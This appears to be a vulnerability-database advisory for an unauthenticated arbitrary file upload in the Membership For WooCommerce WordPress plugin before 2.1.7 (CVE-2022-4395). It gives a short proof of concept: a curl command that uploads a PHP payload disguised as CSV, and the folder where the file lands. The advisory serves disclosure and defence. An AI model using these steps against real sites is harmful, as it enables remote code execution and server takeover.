Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitCydaveWPEX-ID:80407AC4-8CE3-4DF7-9C41-007B69045C40
HistoryJan 04, 2023 - 12:00 a.m.

Membership For WooCommerce < 2.1.7 - Unauthenticated Arbitrary File Upload

2023-01-0400:00:00
cydave
266
woocommerce
security vulnerability
file upload
unauthenticated
exploit
information disclosure

EPSS

0.05

Percentile

93.0%

JSON

The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.

1. Install and activate WooCommerce (dependency, no setup required) 

2. Create a local file containing the payload on /tmp/payload.php 

3. Execute the following curl command:
 
curl -i 'https://example.com/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload' -F 'file=@/tmp/payload.php;type=text/csv'
 
4. The uploaded file will be available at wp-content/uploads/mfw-activity-logger/csv-uploads .

Related

prion 1
githubexploit 1
nvd 1
cvelist 1
wpvulndb 1
cve 1
exploitdb 1
prion
prion
Default credentials
2023-01-30 21:15:00
githubexploit
githubexploit
Exploit for CVE-2022-4395
2023-03-09 12:35:48
nvd
nvd
CVE-2022-4395
2023-01-30 21:15:10
cvelist
cvelist
CVE-2022-4395 Membership For WooCommerce < 2.1.7 - Unauthenticated Arbitrary File Upload
2023-01-30 20:31:42
wpvulndb
wpvulndb
Membership For WooCommerce < 2.1.7 - Unauthenticated Arbitrary File Upload
2023-01-04 00:00:00
cve
cve
CVE-2022-4395
2023-01-30 21:15:10
exploitdb
exploitdb
Wordpress Plugin - Membership For WooCommerce &lt; v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
2024-04-02 00:00:00

EPSS

0.05

Percentile

93.0%

JSON
Related for WPEX-ID:80407AC4-8CE3-4DF7-9C41-007B69045C40
prion1githubexploit1nvd1cvelist1wpvulndb1cve1exploitdb1